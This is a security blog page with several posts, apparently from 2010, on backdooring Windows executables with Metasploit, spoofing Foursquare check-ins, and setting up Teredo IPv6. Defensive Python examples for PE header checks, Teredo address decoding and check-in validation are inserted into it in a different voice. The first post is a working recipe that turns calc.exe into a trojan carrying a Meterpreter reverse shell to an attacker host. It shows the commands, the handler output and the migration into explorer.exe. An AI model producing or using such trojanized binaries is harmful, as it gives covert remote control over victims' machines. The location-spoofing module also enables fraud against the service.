Wednesday, March 24, 2010

Msfencode a Msfpayload Into An Existing Executable


Very cool update to metasploit today:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

This update lets you msfencode a msfpayload into an existing executable, and the new executable still functions like the original. So if you inject into calc.exe you get calc.exe and your backdoor.

Let's see the new msfencode options:

~/trunk$ ./msfencode -h

Usage: ./msfencode

OPTIONS:

    -a  The architecture to encode as
    -b  The list of characters to avoid: '\x00\xff'
    -c  The number of times to encode the data
    -e  The encoder to use
    -h  Help banner
    -i  Encode the contents of the supplied file path
    -k  Keep template working; run payload in new thread (use with -x)
    -l  List available encoders
    -m  Specifies an additional module search path
    -n  Dump encoder information
    -o  The output file
    -p  The platform to encode for
    -s  The maximum size of the encoded data
    -t  The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
    -x  Specify an alternate win32 executable template


Let's make our new backdoored executable.

~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)


Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.
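The -x/-k combination rewrites a legitimate PE so that the injected payload runs when the file starts and the original program carries on as if nothing happened. From the defender's side, that kind of edit tends to leave structural traces in the PE headers. The Python below is an added example of mine, not code from Metasploit or from this post. The three heuristics it applies (entry point in a writable and executable section, entry point in the last section of the file, entry point outside the first code section) are my assumptions about what a template injection commonly looks like, not a description of exactly what revision 8896 writes. It constructs two minimal PE header images in memory, so it runs without any real binary.

```python
import struct

# Section characteristic flags from the PE/COFF specification
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def build_pe(sections, entry_rva):
    """Construct a minimal 32-bit PE (DOS stub, COFF header, optional header,
    section table) for this example. Sections are (name, rva, size, flags);
    no section bodies are emitted because the checks only read the headers."""
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\x00")
    opt_size = 224                                   # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)        # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)          # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)           # FileAlignment
    table = b"".join(
        struct.pack(SECTION_FMT, name.encode().ljust(8, b"\x00"),
                    size, rva, size, 0, 0, 0, 0, 0, flags)
        for name, rva, size, flags in sections)
    return dos + b"PE\x00\x00" + coff + bytes(opt) + table


def parse_pe(data):
    """Return (entry_rva, [section dicts]) from a PE image. PE32 and PE32+
    place AddressOfEntryPoint at the same offset, so both parse here."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsect = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(nsect):
        name, vsize, rva, _, _, _, _, _, _, flags = struct.unpack_from(
            SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\x00").decode(),
                         "rva": rva, "size": vsize, "flags": flags})
    return entry, sections


def entry_point_findings(data):
    """Heuristics (my assumptions, see the lead-in) for an entry point that has
    been redirected into injected code. An empty list means nothing suspicious."""
    entry, sections = parse_pe(data)
    home = next((i for i, s in enumerate(sections)
                 if s["rva"] <= entry < s["rva"] + s["size"]), None)
    if home is None:
        return ["entry point lies outside every section"]
    s = sections[home]
    findings = []
    if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point in writable+executable section {s['name']}")
    if len(sections) > 1 and home == len(sections) - 1:
        findings.append(f"entry point in last section {s['name']}")
    first_code = next((i for i, x in enumerate(sections)
                       if x["flags"] & IMAGE_SCN_CNT_CODE), None)
    if first_code is not None and home != first_code:
        findings.append(f"entry point not in first code section "
                        f"{sections[first_code]['name']}")
    return findings


RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Constructed images: a normal layout, and the same layout with an extra
# RWX section appended and the entry point moved into it.
CLEAN_PE = build_pe([(".text", 0x1000, 0x5000, RX), (".data", 0x6000, 0x1000, RW)], 0x1234)
INJECTED_PE = build_pe([(".text", 0x1000, 0x5000, RX), (".data", 0x6000, 0x1000, RW),
                        (".inj", 0x7000, 0x800, RX | IMAGE_SCN_MEM_WRITE)], 0x7000)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("injected", INJECTED_PE)):
        print(label, entry_point_findings(image) or ["no findings"])
```

Treat hits as a reason to look closer rather than a verdict: runtime packers and some self-modifying programs legitimately trip the same heuristics, so in practice you would combine this with a hash or signature check against a known-good copy of the template.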


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)



Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.

meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
CG

Saturday, March 20, 2010

Working on a new tool


To the readers of this blog,

This blog has been inactive for about a month, but it has nothing to do w/ a standstill on my part. I will post something useful relatively soon, but please know I am co-authoring another AppSec-specific tool and this takes up the majority of my time.

Hopefully when the software (open source) is released it won't disappoint :-)

Cheers,

~cktricky
cktricky

Friday, March 19, 2010

F**king With Foursquare Goes MSF Style


mindless foursquare fun goes metasploit style...

msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info

       Name: Foursquare Location Poster
    Version: $Revision:$
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  CG

Basic options:
  Name      Current Setting     Required  Description
  ----      ---------------     --------  -----------
  PASSWORD  password            yes       foursquare password
  Proxies                       no        Use a proxy chain
  RHOST     api.foursquare.com  yes       The target address
  RPORT     80                  yes       The target port
  USERNAME  username            yes       foursquare username
  VENUEID   185675              yes       foursquare venueid
  VHOST                         no        HTTP server virtual host

Description:
  Fuck with Foursquare, be anywhere you want to be by venue id

References:
  http://groups.google.com/group/foursquare-api
  http://www.mikekey.com/im-a-foursquare-cheater/

msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186

msf auxiliary(foursquare) > run

[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive

Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP

[*] Auxiliary module execution completed


You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb
CG

Thursday, March 18, 2010

Getting Started With IPv6


Getting IPv6 up and running

Install the miredo package:
$ sudo apt-get install miredo

After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.

Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove

Usage:

$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}

If miredo is running you should have another interface called "teredo".
You can display it with the following command:

$ ifconfig teredo

To test if you can reach the IPv6 network, try the following:
carnal0wnage ~: ping6 ipv6.google.com
PING ipv6.google.com(iw-in-x63.1e100.net) 56 data bytes
64 bytes from iw-in-x63.1e100.net: icmp_seq=1 ttl=55 time=284 ms
64 bytes from iw-in-x63.1e100.net: icmp_seq=4 ttl=55 time=100 ms
64 bytes from iw-in-x63.1e100.net: icmp_seq=5 ttl=55 time=108 ms

--- ipv6.google.com ping statistics ---
7 packets transmitted, 3 received, 57% packet loss, time 6000ms
rtt min/avg/max/mdev = 100.005/164.009/284.016/84.920 ms

carnal0wnage ~: ping6 www.ipv6.org
PING www.ipv6.org(igloo.stacken.kth.se) 56 data bytes
64 bytes from igloo.stacken.kth.se: icmp_seq=1 ttl=58 time=472 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=2 ttl=58 time=156 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=3 ttl=58 time=156 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=5 ttl=58 time=156 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=6 ttl=58 time=156 ms

--- www.ipv6.org ping statistics ---
7 packets transmitted, 5 received, 28% packet loss, time 6000ms
rtt min/avg/max/mdev = 156.009/219.212/472.027/126.408 ms

carnal0wnage ~: traceroute6 www.ipv6.org
traceroute to www.ipv6.org (2001:6b0:1:ea:202:a5ff:fecd:13a6), 30 hops max, 40 byte packets
 1  * * *
 2  terminator.csbnet.se (2a02:9a0:0:1::193)  612.035 ms  612.035 ms  612.035 ms
 3  c2sth-ge-5-0-8.sunet.se (2001:6b0:dead:beef:2::3a9)  648.037 ms  648.037 ms  648.037 ms
 4  a1sth-kth.sunet.se (2001:6b0:dead:beef:2::2c6)  636.036 ms  636.036 ms  636.036 ms
 5  2001:6b0:1:1d20::2 (2001:6b0:1:1d20::2)  736.042 ms  736.042 ms  *
 6  *  2001:6b0:1:1200::3 (2001:6b0:1:1200::3)  324.018 ms  324.018 ms
 7  igloo.stacken.kth.se (2001:6b0:1:ea:202:a5ff:fecd:13a6)  160.009 ms  156.009 ms  156.009 ms

Changing the teredo server:

$ sudo vi /etc/miredo.conf
ServerAddress teredo.ipv6.microsoft.com
$ sudo /etc/init.d/miredo restart
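The "2001:0:" prefix the Linux steps tell you to look for is the Teredo service prefix (2001:0::/32, RFC 4380), and the rest of a Teredo address encodes the Teredo server, a flags field, and the client's public IPv4 address and UDP port, the last two stored XORed with all-ones bits. Because Teredo carries IPv6 inside UDP over IPv4, an IPv4-only firewall or IDS sees nothing but UDP datagrams, which is why it is useful on the defensive side to recognise and decode these addresses when they show up in logs. The Python below is an added example of mine, not part of the original post or of miredo. The sample address is the example address from RFC 4380, the three log lines are constructed test data using documentation address ranges, and the decoding is cross-checked against the standard library's IPv6Address.teredo property.

```python
import ipaddress
import re

TEREDO_PREFIX = ipaddress.IPv6Network("2001:0::/32")   # RFC 4380 service prefix


def decode_teredo(text):
    """Decode one Teredo address. Layout (RFC 4380, section 4):
    bits 0-31 prefix, 32-63 Teredo server IPv4, 64-79 flags,
    80-95 client UDP port XOR 0xFFFF, 96-127 client IPv4 XOR 0xFFFFFFFF.
    Returns None for an IPv6 address outside the Teredo prefix and
    raises ValueError if `text` is not an IPv6 address at all."""
    addr = ipaddress.IPv6Address(text)
    if addr not in TEREDO_PREFIX:
        return None
    raw = int(addr)
    server = ipaddress.IPv4Address((raw >> 64) & 0xFFFFFFFF)
    flags = (raw >> 48) & 0xFFFF
    port = ((raw >> 32) & 0xFFFF) ^ 0xFFFF
    client = ipaddress.IPv4Address((raw & 0xFFFFFFFF) ^ 0xFFFFFFFF)
    # The standard library decodes the server and client fields the same way.
    assert addr.teredo == (server, client)
    return {"server": str(server), "cone": bool(flags & 0x8000),
            "port": port, "client": str(client)}


def find_teredo_hosts(log_lines):
    """Scan text log lines for Teredo addresses and decode each one.
    Returns (line number, address, decoded fields) tuples."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        for token in re.split(r"[\s=,;]+", line):
            try:
                info = decode_teredo(token)
            except ValueError:          # token was not an IPv6 address
                continue
            if info is not None:
                hits.append((n, token, info))
    return hits


# RFC 4380 example address: server 65.54.227.120, cone flag set,
# client 192.0.2.45 behind UDP port 40000.
SAMPLE_TEREDO = "2001:0:4136:e378:8000:63bf:3fff:fdd2"

# Constructed firewall log; only line 2 carries a Teredo source address.
SAMPLE_LOG = [
    "2010-03-18 09:12:01 ACCEPT proto=tcp src=2001:db8::10 dst=2001:db8::1 dport=22",
    "2010-03-18 09:12:07 ACCEPT proto=tcp src=" + SAMPLE_TEREDO + " dst=2001:db8::1 dport=3389",
    "2010-03-18 09:12:09 DROP proto=udp src=203.0.113.5 dst=198.51.100.1 dport=3544",
]

if __name__ == "__main__":
    print(decode_teredo(SAMPLE_TEREDO))
    for n, token, info in find_teredo_hosts(SAMPLE_LOG):
        print(f"line {n}: {token} -> client {info['client']}:{info['port']} "
              f"via server {info['server']}")
```

The decoded client field is the public IPv4 address of the NAT the Teredo host sits behind, which is the value you would actually correlate against your IPv4 logs; the port is the NAT mapping miredo or the Windows client was allocated at the time.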


Windows XP

Install
Open a command prompt with Start -> Run -> cmd

netsh interface ipv6 install
netsh interface ipv6 set teredo client

Uninstall

netsh interface ipv6 uninstall

Vista

Install
IPv6 and Teredo are enabled by default. You can get to the settings through the properties of a network interface; "Obtain an IPv6 address automatically" should do the trick.

Uninstall
Add this registry value ("DWORD") set to 0xFF (long line, double-click, and copy):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\DisabledComponents

Or save the two lines in a .reg file and double-click it:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents"=dword:000000ff

You can also go to the properties of a network interface and deselect the IPv6 protocol for that interface. To enable IPv6 again, replace dword:000000ff above with dword:00000000. The DisabledComponents value takes effect after a reboot.


Ref:
http://pugio.net/2007/07/howto-enable-ipv6-the-teredo-w.html
https://blueimp.net/linux/howto/ipv6-teredo.html
CG

Monday, March 15, 2010

F**king with Foursquare


Foursquare is pretty neat. You can post your location via phone or browser and get nifty badges for different things, or become the mayor of a place if you check in to that location the most. It's also exceedingly easy to cheat at.

I only casually mentioned the idea of cheating to @Jack_Mannino and within a few minutes of emailing him the link to the API he was already traveling the globe at record speed.

Foursquare even has a nifty and pretty easy-to-understand API, documented here:
http://groups.google.com/group/foursquare-api/web/api-documentation

The simplest thing you can do is check in and post your location by vid or venue.

URL: http://api.foursquare.com/v1/checkin
Formats: XML, JSON
HTTP Method(s): POST
Requires Authentication: Yes
Parameters:
  • vid - (optional, not necessary if you are 'shouting' or have a venue name). ID of the venue where you want to check-in
  • venue - (optional, not necessary if you are 'shouting' or have a vid) if you don't have a venue ID or would rather prefer a 'venueless' checkin, pass the venue name as a string using this parameter. it will become an 'orphan' (no address or venueid but with geolat, geolong)
  • shout - (optional) a message about your check-in. the maximum length of this field is 140 characters
  • private - (optional). "1" means "don't show your friends". "0" means "show everyone"
  • twitter - (optional, defaults to the user's setting). "1" means "send to Twitter". "0" means "don't send to Twitter"
  • facebook - (optional, defaults to the user's setting). "1" means "send to Facebook". "0" means "don't send to Facebook"
  • geolat - (optional, but recommended)
  • geolong - (optional, but recommended)

So a sample request would look like:

POST /v1/checkin?vid= HTTP/1.1
Authorization: Basic
Host: api.foursquare.com
Proxy-Connection: Keep-Alive
Content-Length:

twitter=1&facebook=0


It being a POST, you'll have to write some code to handle the Content-Length, or use Burp Repeater or Metasploit.

Have fun traveling the globe from your living room.
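Both this post and the Metasploit module above work because the service accepts the vid (and the optional geolat/geolong) exactly as the client sends them. The server-side counterpart, a plausibility check on each check-in before it counts toward badges or mayorships, is what a service owner would want. The Python below is an added example of mine, not Foursquare's code or the module's. It applies two checks: the device's own fix must lie near the venue it claims, and the travel speed implied by the user's previous accepted check-in must be physically possible. The venue table (the Washington Monument at its real coordinates under the venue id 9186 seen on this page, plus a second venue under a made-up id), the thresholds, and the sample check-ins are my assumptions and constructed data.

```python
import math
from datetime import datetime

EARTH_RADIUS_KM = 6371.0
MAX_VENUE_DISTANCE_KM = 0.5    # assumed: device fix must be within 500 m of the venue
MAX_SPEED_KMH = 900.0          # assumed: faster than an airliner is impossible

# Constructed venue table: vid -> (name, lat, lon). 9186 is the venue id the
# post checked in to; 424242 is a made-up id for a second, distant venue.
VENUES = {
    "9186":   ("Washington Monument", 38.8895, -77.0353),
    "424242": ("Constructed venue, New York", 40.7484, -73.9857),
}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two latitude/longitude points, in km."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def validate_checkin(checkin, venues=VENUES, last_checkin=None):
    """Return the reasons a check-in is implausible; an empty list means accept.
    `checkin` mirrors the API parameters (vid, optional geolat/geolong) plus
    a server-assigned `time`; `last_checkin` is the user's previous accepted one."""
    venue = venues.get(checkin["vid"])
    if venue is None:
        return ["unknown vid"]
    vname, vlat, vlon = venue
    reasons = []

    # Check 1: the device's own fix should be near the venue it claims.
    if "geolat" in checkin and "geolong" in checkin:
        d = haversine_km(checkin["geolat"], checkin["geolong"], vlat, vlon)
        if d > MAX_VENUE_DISTANCE_KM:
            reasons.append(f"device fix is {d:.1f} km from {vname}")
    else:
        reasons.append("no device coordinates supplied")

    # Check 2: implied travel speed since the previous accepted check-in.
    if last_checkin is not None:
        _, plat, plon = venues[last_checkin["vid"]]
        dist = haversine_km(plat, plon, vlat, vlon)
        hours = (checkin["time"] - last_checkin["time"]).total_seconds() / 3600
        if dist == 0:
            speed = 0.0
        elif hours <= 0:
            speed = float("inf")       # out-of-order or replayed timestamp
        else:
            speed = dist / hours
        if speed > MAX_SPEED_KMH:
            reasons.append(f"{dist:.0f} km in {hours * 60:.0f} min "
                           f"exceeds {MAX_SPEED_KMH:.0f} km/h")
    return reasons


# Constructed check-ins: a genuine one at the Monument, then one in New York
# ten minutes later with coordinates copied straight from the venue record.
GENUINE = {"vid": "9186", "geolat": 38.8895, "geolong": -77.0353,
           "time": datetime(2010, 3, 19, 13, 59, 28)}
TELEPORTED = {"vid": "424242", "geolat": 40.7484, "geolong": -73.9857,
              "time": datetime(2010, 3, 19, 14, 9, 28)}

if __name__ == "__main__":
    print("genuine:", validate_checkin(GENUINE) or "accept")
    print("teleported:", validate_checkin(TELEPORTED, last_checkin=GENUINE) or "accept")
```

The second check-in passes the distance test because the client simply copied the venue's coordinates, which is exactly what a cheater who reads the API docs would do; it fails only because the service keeps its own history and notices that 330 km in ten minutes is not a trip anyone made. Client-supplied coordinates are a weak signal on their own, and the velocity check across server-side history is the one that actually holds up.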


CG